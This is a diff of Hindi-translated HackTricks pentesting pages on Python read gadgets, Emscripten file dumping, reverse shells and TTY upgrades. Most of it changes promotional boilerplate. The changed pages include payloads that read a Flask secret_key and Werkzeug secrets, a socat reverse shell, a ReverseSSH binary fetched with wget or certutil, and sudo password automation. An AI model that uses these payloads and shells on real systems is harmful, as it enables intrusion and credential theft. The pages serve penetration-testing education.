### Emscripten वर्चुअल मेमोरी फ़ाइल सिस्टम से फ़ाइलों को डंप / पुनः प्राप्त करना:
|
||||
### Emscripten वर्चुअल मेमोरी फ़ाइलसिस्टम से फ़ाइलों को डंप/पुनःप्राप्त करना:
|
||||
|
||||
`CVE ID: CVE-2022-30286`\
|
||||
\
|
||||
|
@ -108,16 +109,17 @@ Result:
|
|||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,41 +1,48 @@
|
|||
# Python आंतरिक पढ़ने के गैजेट्स
|
||||
# Python आंतरिक पठन गैजेट्स
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## मूल जानकारी
|
||||
|
||||
[**Python Format Strings**](bypass-python-sandboxes/#python-format-string) जैसी विभिन्न सुरक्षा दोष या [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) आपको **Python आंतरिक डेटा पढ़ने की अनुमति देती हैं लेकिन आपको कोड को नहीं चलाने देतीं**। इसलिए, एक पेंटेस्टर को इन पढ़ने की अनुमतियों का सबसे अधिक उपयोग करना होगा ताकि **संवेदनशील विशेषाधिकार प्राप्त कर सके और सुरक्षा दोष को उन्नत कर सके**।
|
||||
विभिन्न सुरक्षा गंभीरताएं जैसे कि [**Python Format Strings**](bypass-python-sandboxes/#python-format-string) या [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) आपको **Python आंतरिक डेटा पठन करने की अनुमति देती हैं लेकिन आपको कोड को नहीं चलाने देगी**। इसलिए, एक पेंटेस्टर को इन पठन अनुमतियों का सबसे अधिक उपयोग करने की आवश्यकता होगी **संवेदनशील विशेषाधिकार प्राप्त करने और सुरक्षा गंभीरता को उन्नत करने** के लिए।
|
||||
|
||||
### Flask - गुप्त कुंजी पढ़ें
|
||||
### Flask - गुप्त कुंजी पठन
|
||||
|
||||
एक Flask एप्लिकेशन का मुख्य पृष्ठ **`app`** ग्लोबल ऑब्जेक्ट होगा जहाँ यह **गुप्त कूटिक** कॉन्फ़िगर किया जाएगा।
|
||||
एक Flask एप्लिकेशन का मुख्य पृष्ठ शायद **`app`** ग्लोबल ऑब्जेक्ट होगा जहाँ यह **गुप्त कूट समाकृत होता है**।
|
||||
```python
|
||||
app = Flask(__name__, template_folder='templates')
|
||||
app.secret_key = '(:secret:)'
|
||||
```
|
||||
इस मामले में, इस ऑब्ज
|
||||
इस मामले में, इस ऑब्जेक्ट तक पहुंचना संभव है जिसके लिए केवल किसी गैजेट का उपयोग करना है **ग्लोबल ऑब्जेक्ट्स तक पहुंचने** के लिए [**बाइपास पायथन सैंडबॉक्स पेज**](bypass-python-sandboxes/) से।
|
||||
|
||||
उस मामले में जहां **वलनरेबिलिटी एक विभिन्न पायथन फ़ाइल में है**, आपको मुख्य फ़ाइल तक पहुंचने के लिए फ़ाइलों को चलने के लिए एक गैजेट की आवश्यकता है ताकि **ग्लोबल ऑब्जेक्ट `app.secret_key`** तक पहुंच सकें और फ्लास्क सीक्रेट कुंजी को बदल सकें और [**इस कुंजी को जानकर विशेषाधिकारों को बढ़ाने**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign) में सक्षम हों।
|
||||
|
||||
इस लेख से एक ऐसा पेलोड:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```python
|
||||
__init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
इस payload का उपयोग करें **`app.secret_key`** को बदलने के लिए (आपके ऐप में नाम अलग हो सकता है) ताकि आप नए और अधिक विशेषाधिकार flask cookies को साइन कर सकें।
|
||||
इस payload का उपयोग करें **`app.secret_key` को बदलने** के लिए (आपके ऐप में नाम अलग हो सकता है) ताकि आप नए और अधिक विशेषाधिकार वाले flask cookies को साइन कर सकें।
|
||||
|
||||
### Werkzeug - machine\_id और node uuid
|
||||
|
||||
[**इस लेख से इन payload का उपयोग करके**](https://vozec.fr/writeups/tweedle-dum-dee/) आप **machine\_id** और **uuid** नोड तक पहुँच सकेंगे, जो हैं **मुख्य रहस्य** जिनकी आपको आवश्यकता होगी [**Werkzeug pin उत्पन्न करने के लिए**](../../network-services-pentesting/pentesting-web/werkzeug.md) जिसका उपयोग आप `/console` में पहुँचने के लिए कर सकते हैं अगर **debug mode सक्षम है:**
|
||||
[**इस लेख से इन payload का उपयोग करके**](https://vozec.fr/writeups/tweedle-dum-dee/) आप **machine\_id** और **uuid** नोड तक पहुँच सकेंगे, जो हैं **मुख्य रहस्य** जिनकी आपको [**Werkzeug पिन उत्पन्न करने के लिए**](../../network-services-pentesting/pentesting-web/werkzeug.md) आवश्यकता है जिसका उपयोग आप `/console` में पहुँचने के लिए कर सकते हैं अगर **डीबग मोड सक्षम है:**
|
||||
```python
|
||||
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
|
||||
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}
|
||||
|
@ -46,16 +53,17 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
|
|||
|
||||
यदि कमजोरी एक विभिन्न पायथन फ़ाइल में है, तो मुख्य पायथन फ़ाइल से ऑब्जेक्ट तक पहुंचने के लिए पिछले फ्लास्क ट्रिक की जाँच करें।
|
||||
|
||||
{% hint style="success" %}
|
||||
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **PDF में HackTricks डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फ़ॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# [**शैल्स - लिनक्स**](linux.md)
|
||||
|
@ -21,7 +22,7 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
# [**पूर्ण TTYs**](full-ttys.md)
|
||||
|
||||
# **स्वचालित जनरेटेड शैल्स**
|
||||
# **स्वचालित जेनरेटेड शैल्स**
|
||||
|
||||
* [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
|
||||
* [**https://www.revshells.com/**](https://www.revshells.com/)
|
||||
|
@ -36,16 +37,17 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# पूर्ण TTYs
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## पूर्ण TTY
|
||||
|
||||
ध्यान दें कि जिस शैल आप `SHELL` चर में सेट करते हैं, वह **अवश्य** _**/etc/shells**_ के अंदर **सूचीबद्ध होनी चाहिए** या `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`। इसके अलावा, ध्यान दें कि अगले स्निपेट्स केवल बैश में काम करेंगे। यदि आप zsh में हैं, तो `bash` चलाकर शैल अर्जित करने से पहले बैश में बदलें।
|
||||
ध्यान दें कि जिस शैल आप `SHELL` चर में सेट करते हैं, **उसे** _**/etc/shells**_ **में सूचीबद्ध होना चाहिए** या `SHELL` चर के लिए मान _**/etc/shells**_ फ़ाइल में नहीं मिला गया था इस घटना की सूचना दी गई है। इसके अलावा, ध्यान दें कि अगले स्निपेट्स केवल बैश में काम करते हैं। यदि आप zsh में हैं, तो शेल को प्राप्त करने से पहले `bash` चलाने के लिए बैश में बदलें।
|
||||
|
||||
#### Python
|
||||
|
||||
|
@ -49,7 +50,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
|
|||
#Victim:
|
||||
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
||||
```
|
||||
### **शैल्स उत्पन्न करें**
|
||||
### **शैल उत्पन्न करें**
|
||||
|
||||
* `python -c 'import pty; pty.spawn("/bin/sh")'`
|
||||
* `echo os.system('/bin/bash')`
|
||||
|
@ -64,15 +65,13 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
|||
* vi: `:set shell=/bin/bash:shell`
|
||||
* nmap: `!sh`
|
||||
|
||||
## **रिवर्स एसएसएच**
|
||||
## **रिवर्सएसएसएच**
|
||||
|
||||
**इंटरैक्टिव शैल एक्सेस**, साथ ही **फ़ाइल ट्रांसफ़र** और **पोर्ट फ़ॉरवर्डिंग** के लिए एक सुविधाजनक तरीका है, लक्षित को ड्रॉप करना स्थिर लिंक्ड एसएसएच सर्वर [रिवर्स एसएसएच](https://github.com/Fahrj/reverse-ssh) टारगेट पर।
|
||||
**इंटरैक्टिव शैल एक्सेस**, साथ ही **फ़ाइल ट्रांसफ़र** और **पोर्ट फ़ॉरवर्डिंग** के लिए एक सुविधाजनक तरीका है, लक्षित पर एक स्थिर-लिंक्ड एसएसएच सर्वर [रिवर्सएसएसएच](https://github.com/Fahrj/reverse-ssh) को लक्षित पर छोड़ना।
|
||||
|
||||
नीचे एक उदाहरण है `x86` के लिए उपक्षिप्त बाइनरी के साथ। अन्य बाइनरी के लिए, देखें [रिलीज पेज](https://github.com/Fahrj/reverse-ssh/releases/latest/)।
|
||||
नीचे एक उदाहरण है `x86` के लिए उपक्षिप्त बाइनरी के साथ। अन्य बाइनरी के लिए, [रिलीज़ पेज](https://github.com/Fahrj/reverse-ssh/releases/latest/) की जांच करें।
|
||||
|
||||
1. एसएसएच पोर्ट फॉरवर्डिंग अनुरोध पकड़ने के लिए स्थानीय रूप से तैयारी करें:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
1. लोकली तैयारी करें ताकि एसएसएच पोर्ट फ़ॉरवर्डिंग अनुरोध को पकड़ सकें:
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
|
||||
|
@ -99,9 +98,7 @@ certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/d
|
|||
|
||||
reverse-ssh.exe -p 4444 kali@10.0.0.2
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
* यदि ReverseSSH पोर्ट फॉरवर्डिंग अनुरोध सफल रहा है, तो अब आपको `reverse-ssh(.exe)` चलाने वाले उपयोगकर्ता के संदर्भ में डिफ़ॉल्ट पासवर्ड `letmeinbrudipls` के साथ लॉग इन करने में सक्षम होना चाहिए:
|
||||
* यदि रिवर्स SSH पोर्ट फॉरवर्डिंग अनुरोध सफल रहा है, तो अब आपको `reverse-ssh(.exe)` चलाने वाले उपयोगकर्ता के संदर्भ में डिफ़ॉल्ट पासवर्ड `letmeinbrudipls` के साथ लॉग इन करने में सक्षम होना चाहिए:
|
||||
```bash
|
||||
# Interactive shell access
|
||||
ssh -p 8888 127.0.0.1
|
||||
|
@ -111,20 +108,21 @@ sftp -P 8888 127.0.0.1
|
|||
```
|
||||
## कोई TTY नहीं
|
||||
|
||||
यदि किसी कारणवश आपको एक पूर्ण TTY प्राप्त नहीं हो सकता है, तो भी आप **प्रोग्रामों के साथ बातचीत कर सकते हैं** जो उपयोगकर्ता इनपुट की अपेक्षा करते हैं। निम्नलिखित उदाहरण में, पासवर्ड `sudo` को पास किया जाता है ताकि एक फ़ाइल पढ़ सके:
|
||||
यदि किसी कारणवश आपको एक पूर्ण TTY प्राप्त नहीं हो सकता है, तो फिर भी आप **प्रोग्रामों के साथ बातचीत कर सकते हैं** जो उपयोगकर्ता इनपुट की अपेक्षा करते हैं। निम्नलिखित उदाहरण में, पासवर्ड `sudo` को फ़ाइल पढ़ने के लिए पारित किया जाता है:
|
||||
```bash
|
||||
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की हमारी विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह की खोज करें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** के लिए PRs सबमिट करके और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
